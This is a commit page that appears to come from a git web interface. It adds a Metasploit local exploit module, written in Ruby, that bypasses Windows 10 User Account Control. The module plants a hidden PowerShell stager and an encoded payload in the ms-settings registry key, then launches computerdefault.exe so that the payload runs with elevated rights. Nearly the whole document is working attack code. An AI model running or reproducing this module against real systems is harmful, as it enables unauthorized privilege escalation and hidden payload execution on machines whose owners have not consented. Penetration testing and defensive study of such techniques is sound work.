Land #10886, Bypassuac computerdefault
Merge branch 'land-10886' into upstream-masterGSoC/Meterpreter_Web_Console
commit
14b2cdc120
|
@ -0,0 +1,206 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/exploit/exe'
|
||||
require 'msf/core/exploit/powershell'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Exploit::Powershell
|
||||
include Post::Windows::Priv
|
||||
include Post::Windows::Registry
|
||||
include Post::Windows::Runas
|
||||
|
||||
COMPUTERDEFAULT_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze
|
||||
COMPUTERDEFAULT_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
|
||||
EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
|
||||
EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
|
||||
EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
|
||||
COMPUTERDEFAULT_PATH = "%WINDIR%\\System32\\computerdefault.exe".freeze
|
||||
CMD_MAX_LEN = 16383
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Windows UAC Protection Bypass (Via ComputerDefault Registry Key)',
|
||||
'Description' => %q{
|
||||
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
|
||||
the current user hive, and inserting a custom command that will get invoked when
|
||||
the Windows computerdefault.exe application is launched. It will spawn a second shell that has the UAC
|
||||
flag turned off.
|
||||
This module modifies a registry key, but cleans up the key once the payload has
|
||||
been invoked.
|
||||
The module does not require the architecture of the payload to match the OS. If
|
||||
specifying EXE::Custom your DLL should call ExitProcess() after starting your
|
||||
payload in a separate process.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'St0rn - Synetis.com', # UAC bypass discovery and research
|
||||
'St0rn - fabien.dromas@synetis.com', # MSF module
|
||||
],
|
||||
'Platform' => ['win'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Targets' => [
|
||||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'References' => [
|
||||
[
|
||||
'URL', 'https://github.com/St0rn/Windows-10-Exploit/blob/master/uac_computerDefault.py'
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => 'October 22 2018'
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
commspec = '%COMSPEC%'
|
||||
registry_view = REGISTRY_VIEW_NATIVE
|
||||
psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
|
||||
|
||||
# Make sure we have a sane payload configuration
|
||||
if sysinfo['Architecture'] == ARCH_X64
|
||||
if session.arch == ARCH_X86
|
||||
# fodhelper.exe is x64 only exe
|
||||
commspec = '%WINDIR%\\Sysnative\\cmd.exe'
|
||||
if target_arch.first == ARCH_X64
|
||||
# We can't use absolute path here as
|
||||
# %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
|
||||
psh_path = "powershell.exe"
|
||||
end
|
||||
end
|
||||
if target_arch.first == ARCH_X86
|
||||
# Invoking x86, so switch to SysWOW64
|
||||
psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
|
||||
end
|
||||
else
|
||||
# if we're on x86, we can't handle x64 payloads
|
||||
if target_arch.first == ARCH_X64
|
||||
fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
|
||||
end
|
||||
end
|
||||
|
||||
if !payload.arch.empty? && (payload.arch.first != target_arch.first)
|
||||
fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
|
||||
end
|
||||
|
||||
# Validate that we can actually do things before we bother
|
||||
# doing any more work
|
||||
check_permissions!
|
||||
|
||||
case get_uac_level
|
||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
|
||||
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
|
||||
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
||||
fail_with(Failure::NotVulnerable,
|
||||
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
|
||||
when UAC_DEFAULT
|
||||
print_good('UAC is set to Default')
|
||||
print_good('BypassUAC can bypass this setting, continuing...')
|
||||
when UAC_NO_PROMPT
|
||||
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
|
||||
shell_execute_exe
|
||||
return
|
||||
end
|
||||
|
||||
payload_value = rand_text_alpha(8)
|
||||
psh_path = expand_path(psh_path)
|
||||
|
||||
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
|
||||
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
|
||||
|
||||
if psh_payload.length > CMD_MAX_LEN
|
||||
fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
|
||||
end
|
||||
|
||||
psh_stager = "\"IEX (Get-ItemProperty -Path #{COMPUTERDEFAULT_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
|
||||
cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
|
||||
|
||||
existing = registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
|
||||
exist_delegate = !registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?
|
||||
|
||||
if existing.empty?
|
||||
registry_createkey(COMPUTERDEFAULT_WRITE_KEY, registry_view)
|
||||
end
|
||||
|
||||
print_status("Configuring payload and stager registry keys ...")
|
||||
unless exist_delegate
|
||||
registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
|
||||
end
|
||||
|
||||
registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
|
||||
registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
|
||||
|
||||
# Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
|
||||
cmd_path = expand_path(commspec)
|
||||
cmd_args = expand_path("/c #{COMPUTERDEFAULT_PATH}")
|
||||
print_status("Executing payload: #{cmd_path} #{cmd_args}")
|
||||
|
||||
# We can't use cmd_exec here because it blocks, waiting for a result.
|
||||
client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })
|
||||
|
||||
# Wait a copule of seconds to give the payload a chance to fire before cleaning up
|
||||
# TODO: fix this up to use something smarter than a timeout?
|
||||
Rex::sleep(5)
|
||||
|
||||
handler(client)
|
||||
|
||||
print_status("Cleaining up registry keys ...")
|
||||
unless exist_delegate
|
||||
registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
|
||||
end
|
||||
if existing.empty?
|
||||
registry_deletekey(COMPUTERDEFAULT_DEL_KEY, registry_view)
|
||||
else
|
||||
registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
|
||||
end
|
||||
registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, payload_value, registry_view)
|
||||
end
|
||||
|
||||
def check_permissions!
|
||||
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
|
||||
|
||||
# Check if you are an admin
|
||||
vprint_status('Checking admin status...')
|
||||
admin_group = is_in_admin_group?
|
||||
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
|
||||
end
|
||||
|
||||
unless is_in_admin_group?
|
||||
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
|
||||
end
|
||||
|
||||
print_status('UAC is Enabled, checking level...')
|
||||
if admin_group.nil?
|
||||
print_error('Either whoami is not there or failed to execute')
|
||||
print_error('Continuing under assumption you already checked...')
|
||||
else
|
||||
if admin_group
|
||||
print_good('Part of Administrators group! Continuing...')
|
||||
else
|
||||
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
|
||||
end
|
||||
end
|
||||
|
||||
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
|
||||
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue